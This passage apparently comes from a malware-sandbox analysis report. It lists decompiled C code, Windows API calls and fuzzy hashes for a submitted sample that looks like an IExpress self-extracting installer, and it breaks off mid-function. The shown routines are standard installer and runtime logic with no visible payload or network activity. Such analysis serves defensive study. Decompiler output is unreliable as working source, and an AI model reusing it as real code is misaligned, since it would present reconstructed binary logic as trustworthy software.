                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                      • API String ID: 4204503880-1888249752
                                                                                                                                                                                                      • Opcode ID: 4f40351f89cc570788776db9df23cb1d02ab8a3e017c2fbcdf744bbc3507240a
                                                                                                                                                                                                      • Instruction ID: 682d101e969fb15c61b2423236b468eaacc2d95312c27abd9f3f6090a5a43c9a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f40351f89cc570788776db9df23cb1d02ab8a3e017c2fbcdf744bbc3507240a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43119331E00309AFEB14DFA5DC49ABEBBB8EF84705F144579F919F2290DA309D448B92
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E76CF0(char _a4) {
                                                                                                                                                                                                      
                                                                                                                                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                      				_t1 =  &_a4; // 0xe76e26
                                                                                                                                                                                                      				UnhandledExceptionFilter( *_t1);
                                                                                                                                                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                      			}



                                                                                                                                                                                                      0x00e76cf7
                                                                                                                                                                                                      0x00e76cfd
                                                                                                                                                                                                      0x00e76d00
                                                                                                                                                                                                      0x00e76d19

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E76E26,00E71000), ref: 00E76CF7
                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(&n,?,00E76E26,00E71000), ref: 00E76D00
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,00E76E26,00E71000), ref: 00E76D0B
                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00E76E26,00E71000), ref: 00E76D12
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                      • String ID: &n
                                                                                                                                                                                                      • API String ID: 3231755760-661210962
                                                                                                                                                                                                      • Opcode ID: b20fa5cea70bb85946143922f3c625a3d1ecc54c99b0ff4730289b46c37987ea
                                                                                                                                                                                                      • Instruction ID: b9557ee3c5e57be81afda626b14bb33976007ac73a5da2972f199c7cfd93d9ab
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b20fa5cea70bb85946143922f3c625a3d1ecc54c99b0ff4730289b46c37987ea
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9D0C9B2001108BFFB006BE2EC0CA6D3F28EBC8222F8C4020F31DA2420CA324495CB52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E77155() {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				struct _FILETIME _v16;
                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                      				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                      				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                      				_t23 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                      					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                      					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                      					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                      					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                      					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                      					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                      					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                      					_t39 = _t36;
                                                                                                                                                                                                      					if(_t36 == 0xbb40e64e || ( *0xe78004 & 0xffff0000) == 0) {
                                                                                                                                                                                                      						_t36 = 0xbb40e64f;
                                                                                                                                                                                                      						_t39 = 0xbb40e64f;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0xe78004 = _t39;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t37 =  !_t36;
                                                                                                                                                                                                      				 *0xe78008 = _t37;
                                                                                                                                                                                                      				return _t37;
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x00e7715d
                                                                                                                                                                                                      0x00e77161
                                                                                                                                                                                                      0x00e77165
                                                                                                                                                                                                      0x00e77178
                                                                                                                                                                                                      0x00e77182
                                                                                                                                                                                                      0x00e7718e
                                                                                                                                                                                                      0x00e77197
                                                                                                                                                                                                      0x00e771a0
                                                                                                                                                                                                      0x00e771b1
                                                                                                                                                                                                      0x00e771b8
                                                                                                                                                                                                      0x00e771c4
                                                                                                                                                                                                      0x00e771c7
                                                                                                                                                                                                      0x00e771cb
                                                                                                                                                                                                      0x00e771d5
                                                                                                                                                                                                      0x00e771da
                                                                                                                                                                                                      0x00e771da
                                                                                                                                                                                                      0x00e771dc
                                                                                                                                                                                                      0x00e771dc
                                                                                                                                                                                                      0x00e771e2
                                                                                                                                                                                                      0x00e771e5
                                                                                                                                                                                                      0x00e771ee

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00E77182
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00E77191
                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00E7719A
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00E771A3
                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00E771B8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                                                                                      • Opcode ID: 6c9a7f78da0d74151a8c4d9c500291caf4401cf03cd277c01481145e77b0c6fd
                                                                                                                                                                                                      • Instruction ID: 436644ecbe0bbb8bdad00d1584553b21d19f234512985918d9b4119326e48b33
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c9a7f78da0d74151a8c4d9c500291caf4401cf03cd277c01481145e77b0c6fd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B114C71D02208DFDB10DFB9EA48A9EB7F5EF58315FA54865D809F7210EA309A48CB41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                                                                      			E00E73210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				int _t20;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				int _t23;
                                                                                                                                                                                                      				char _t24;
                                                                                                                                                                                                      				long _t25;
                                                                                                                                                                                                      				int _t27;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                      				int _t33;
                                                                                                                                                                                                      				int _t34;
                                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                                      				int _t38;
                                                                                                                                                                                                      				int _t39;
                                                                                                                                                                                                      				void* _t42;
                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                      				CHAR* _t49;
                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				struct HWND__* _t64;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t64 = _a4;
                                                                                                                                                                                                      				_t6 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					L38:
                                                                                                                                                                                                      					EndDialog(_t64, ??);
                                                                                                                                                                                                      					L39:
                                                                                                                                                                                                      					__eflags = 1;
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t42 = 1;
                                                                                                                                                                                                      				_t10 = _t6 - 0x100;
                                                                                                                                                                                                      				if(_t10 == 0) {
                                                                                                                                                                                                      					E00E743D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                      					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                      					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                      					__eflags =  *0xe79a40 - _t42; // 0x3
                                                                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                                                                      						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L36:
                                                                                                                                                                                                      					return _t42;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t10 == _t42) {
                                                                                                                                                                                                      					_t20 = _a12 - 1;
                                                                                                                                                                                                      					__eflags = _t20;
                                                                                                                                                                                                      					if(_t20 == 0) {
                                                                                                                                                                                                      						_t21 = GetDlgItemTextA(_t64, 0x835, 0xe791e4, 0x104);
                                                                                                                                                                                                      						__eflags = _t21;
                                                                                                                                                                                                      						if(_t21 == 0) {
                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                      							_t58 = 0x4bf;
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							L25:
                                                                                                                                                                                                      							E00E744B9(_t64, _t58);
                                                                                                                                                                                                      							goto L39;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t49 = 0xe791e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t23 =  *_t49;
                                                                                                                                                                                                      							_t49 =  &(_t49[1]);
                                                                                                                                                                                                      							__eflags = _t23;
                                                                                                                                                                                                      						} while (_t23 != 0);
                                                                                                                                                                                                      						__eflags = _t49 - 0xe791e5 - 3;
                                                                                                                                                                                                      						if(_t49 - 0xe791e5 < 3) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t24 =  *0xe791e5; // 0x3a
                                                                                                                                                                                                      						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                      						if(_t24 == 0x3a) {
                                                                                                                                                                                                      							L21:
                                                                                                                                                                                                      							_t25 = GetFileAttributesA(0xe791e4);
                                                                                                                                                                                                      							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                      							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      								L26:
                                                                                                                                                                                                      								E00E7658A(0xe791e4, 0x104, 0xe71140);
                                                                                                                                                                                                      								_t27 = E00E758C8(0xe791e4);
                                                                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                                                                      								if(_t27 != 0) {
                                                                                                                                                                                                      									__eflags =  *0xe791e4 - 0x5c;
                                                                                                                                                                                                      									if( *0xe791e4 != 0x5c) {
                                                                                                                                                                                                      										L30:
                                                                                                                                                                                                      										_t30 = E00E7597D(0xe791e4, 1, _t64, 1);
                                                                                                                                                                                                      										__eflags = _t30;
                                                                                                                                                                                                      										if(_t30 == 0) {
                                                                                                                                                                                                      											L35:
                                                                                                                                                                                                      											_t42 = 1;
                                                                                                                                                                                                      											__eflags = 1;
                                                                                                                                                                                                      											goto L36;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										L31:
                                                                                                                                                                                                      										_t42 = 1;
                                                                                                                                                                                                      										EndDialog(_t64, 1);
                                                                                                                                                                                                      										goto L36;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									__eflags =  *0xe791e5 - 0x5c;
                                                                                                                                                                                                      									if( *0xe791e5 == 0x5c) {
                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L30;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_t58 = 0x4be;
                                                                                                                                                                                                      								goto L25;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t32 = E00E744B9(_t64, 0x54a, 0xe791e4, 0, 0x20, 4);
                                                                                                                                                                                                      							__eflags = _t32 - 6;
                                                                                                                                                                                                      							if(_t32 != 6) {
                                                                                                                                                                                                      								goto L35;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t33 = CreateDirectoryA(0xe791e4, 0);
                                                                                                                                                                                                      							__eflags = _t33;
                                                                                                                                                                                                      							if(_t33 != 0) {
                                                                                                                                                                                                      								goto L26;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0xe791e4);
                                                                                                                                                                                                      							_t58 = 0x4cb;
                                                                                                                                                                                                      							goto L25;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags =  *0xe791e4 - 0x5c;
                                                                                                                                                                                                      						if( *0xe791e4 != 0x5c) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                      						if(_t24 != 0x5c) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t34 = _t20 - 1;
                                                                                                                                                                                                      					__eflags = _t34;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						EndDialog(_t64, 0);
                                                                                                                                                                                                      						 *0xe79124 = 0x800704c7;
                                                                                                                                                                                                      						goto L39;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t34 != 0x834;
                                                                                                                                                                                                      					if(_t34 != 0x834) {
                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t37 = LoadStringA( *0xe79a3c, 0x3e8, 0xe78598, 0x200);
                                                                                                                                                                                                      					__eflags = _t37;
                                                                                                                                                                                                      					if(_t37 != 0) {
                                                                                                                                                                                                      						_t38 = E00E74224(_t64, _t46, _t46);
                                                                                                                                                                                                      						__eflags = _t38;
                                                                                                                                                                                                      						if(_t38 == 0) {
                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t39 = SetDlgItemTextA(_t64, 0x835, 0xe787a0);
                                                                                                                                                                                                      						__eflags = _t39;
                                                                                                                                                                                                      						if(_t39 != 0) {
                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t63 = 0x4c0;
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						E00E744B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						goto L38;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t63 = 0x4b1;
                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}

























                                                                                                                                                                                                      0x00e7321b
                                                                                                                                                                                                      0x00e7321e
                                                                                                                                                                                                      0x00e73221
                                                                                                                                                                                                      0x00e7343c
                                                                                                                                                                                                      0x00e7343e
                                                                                                                                                                                                      0x00e7343f
                                                                                                                                                                                                      0x00e73445
                                                                                                                                                                                                      0x00e73447
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73447
                                                                                                                                                                                                      0x00e73229
                                                                                                                                                                                                      0x00e7322a
                                                                                                                                                                                                      0x00e7322f
                                                                                                                                                                                                      0x00e733ec
                                                                                                                                                                                                      0x00e733f7
                                                                                                                                                                                                      0x00e73410
                                                                                                                                                                                                      0x00e73416
                                                                                                                                                                                                      0x00e7341d
                                                                                                                                                                                                      0x00e7342d
                                                                                                                                                                                                      0x00e7342d
                                                                                                                                                                                                      0x00e73438
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73438
                                                                                                                                                                                                      0x00e73237
                                                                                                                                                                                                      0x00e73243
                                                                                                                                                                                                      0x00e73243
                                                                                                                                                                                                      0x00e73246
                                                                                                                                                                                                      0x00e732ee
                                                                                                                                                                                                      0x00e732f4
                                                                                                                                                                                                      0x00e732f6
                                                                                                                                                                                                      0x00e733d4
                                                                                                                                                                                                      0x00e733d6
                                                                                                                                                                                                      0x00e733db
                                                                                                                                                                                                      0x00e733dc
                                                                                                                                                                                                      0x00e733de
                                                                                                                                                                                                      0x00e733df
                                                                                                                                                                                                      0x00e73370
                                                                                                                                                                                                      0x00e73372
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73372
                                                                                                                                                                                                      0x00e732fc
                                                                                                                                                                                                      0x00e73301
                                                                                                                                                                                                      0x00e73301
                                                                                                                                                                                                      0x00e73303
                                                                                                                                                                                                      0x00e73304
                                                                                                                                                                                                      0x00e73304
                                                                                                                                                                                                      0x00e7330a
                                                                                                                                                                                                      0x00e7330d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73313
                                                                                                                                                                                                      0x00e73318
                                                                                                                                                                                                      0x00e7331a
                                                                                                                                                                                                      0x00e73331
                                                                                                                                                                                                      0x00e73332
                                                                                                                                                                                                      0x00e7333a
                                                                                                                                                                                                      0x00e7333d
                                                                                                                                                                                                      0x00e7337c
                                                                                                                                                                                                      0x00e73388
                                                                                                                                                                                                      0x00e7338f
                                                                                                                                                                                                      0x00e73394
                                                                                                                                                                                                      0x00e73396
                                                                                                                                                                                                      0x00e733a4
                                                                                                                                                                                                      0x00e733ab
                                                                                                                                                                                                      0x00e733b6
                                                                                                                                                                                                      0x00e733be
                                                                                                                                                                                                      0x00e733c3
                                                                                                                                                                                                      0x00e733c5
                                                                                                                                                                                                      0x00e73435
                                                                                                                                                                                                      0x00e73437
                                                                                                                                                                                                      0x00e73437
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73437
                                                                                                                                                                                                      0x00e733c7
                                                                                                                                                                                                      0x00e733c9
                                                                                                                                                                                                      0x00e733cc
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e733cc
                                                                                                                                                                                                      0x00e733ad
                                                                                                                                                                                                      0x00e733b4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e733b4
                                                                                                                                                                                                      0x00e73398
                                                                                                                                                                                                      0x00e73399
                                                                                                                                                                                                      0x00e7339b
                                                                                                                                                                                                      0x00e7339c
                                                                                                                                                                                                      0x00e7339d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7339d
                                                                                                                                                                                                      0x00e7334c
                                                                                                                                                                                                      0x00e73351
                                                                                                                                                                                                      0x00e73354
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7335c
                                                                                                                                                                                                      0x00e73362
                                                                                                                                                                                                      0x00e73364
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73366
                                                                                                                                                                                                      0x00e73367
                                                                                                                                                                                                      0x00e73369
                                                                                                                                                                                                      0x00e7336a
                                                                                                                                                                                                      0x00e7336b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7336b
                                                                                                                                                                                                      0x00e7331c
                                                                                                                                                                                                      0x00e73323
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73329
                                                                                                                                                                                                      0x00e7332b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7332b
                                                                                                                                                                                                      0x00e7324c
                                                                                                                                                                                                      0x00e7324c
                                                                                                                                                                                                      0x00e7324f
                                                                                                                                                                                                      0x00e732c8
                                                                                                                                                                                                      0x00e732ce
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e732ce
                                                                                                                                                                                                      0x00e73251
                                                                                                                                                                                                      0x00e73256
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73271
                                                                                                                                                                                                      0x00e73277
                                                                                                                                                                                                      0x00e73279
                                                                                                                                                                                                      0x00e73298
                                                                                                                                                                                                      0x00e7329d
                                                                                                                                                                                                      0x00e7329f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e732b0
                                                                                                                                                                                                      0x00e732b6
                                                                                                                                                                                                      0x00e732b8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e732be
                                                                                                                                                                                                      0x00e73280
                                                                                                                                                                                                      0x00e73289
                                                                                                                                                                                                      0x00e7328e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7328e
                                                                                                                                                                                                      0x00e7327b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7327b
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadStringA.USER32(000003E8,00E78598,00000200), ref: 00E73271
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00E733E2
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 00E733F7
                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00E73410
                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000836), ref: 00E73426
                                                                                                                                                                                                      • EnableWindow.USER32(00000000), ref: 00E7342D
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 00E7343F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$cent
                                                                                                                                                                                                      • API String ID: 2418873061-2129869747
                                                                                                                                                                                                      • Opcode ID: 924715773bf72bc58e1c3a09ba4338371e8c56231c6434d4fe9fee5f3df37ade
                                                                                                                                                                                                      • Instruction ID: 745883180e887bde93b63b868bce84d628554bf4d50e73676d74ece59c7ac1d5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 924715773bf72bc58e1c3a09ba4338371e8c56231c6434d4fe9fee5f3df37ade
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B15178703412417AF7B59B365C8CFBF6A499B86B09F40E038F21DB60D1DAA48A46B261
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00E72CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				struct HRSRC__* _t31;
                                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                                      				void* _t43;
                                                                                                                                                                                                      				void* _t48;
                                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                                      				struct HINSTANCE__* _t66;
                                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t13 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                      				_t65 = 0;
                                                                                                                                                                                                      				_t66 = __ecx;
                                                                                                                                                                                                      				_t48 = __edx;
                                                                                                                                                                                                      				 *0xe79a3c = __ecx;
                                                                                                                                                                                                      				memset(0xe79140, 0, 0x8fc);
                                                                                                                                                                                                      				memset(0xe78a20, 0, 0x32c);
                                                                                                                                                                                                      				memset(0xe788c0, 0, 0x104);
                                                                                                                                                                                                      				 *0xe793ec = 1;
                                                                                                                                                                                                      				_t20 = E00E7468F("TITLE", 0xe79154, 0x7f);
                                                                                                                                                                                                      				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                      					_t64 = 0x4b1;
                                                                                                                                                                                                      					goto L32;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                      					 *0xe7858c = _t27;
                                                                                                                                                                                                      					SetEvent(_t27);
                                                                                                                                                                                                      					_t64 = 0xe79a34;
                                                                                                                                                                                                      					if(E00E7468F("EXTRACTOPT", 0xe79a34, 4) != 0) {
                                                                                                                                                                                                      						if(( *0xe79a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                      							L12:
                                                                                                                                                                                                      							 *0xe79120 =  *0xe79120 & _t65;
                                                                                                                                                                                                      							if(E00E75C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                      								if( *0xe78a3a == 0) {
                                                                                                                                                                                                      									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                      									if(_t31 != 0) {
                                                                                                                                                                                                      										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if( *0xe78184 != 0) {
                                                                                                                                                                                                      										__imp__#17();
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if( *0xe78a24 == 0) {
                                                                                                                                                                                                      										_t57 = _t65;
                                                                                                                                                                                                      										if(E00E736EE(_t65) == 0) {
                                                                                                                                                                                                      											goto L33;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t33 =  *0xe79a40; // 0x3
                                                                                                                                                                                                      											_t48 = 1;
                                                                                                                                                                                                      											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
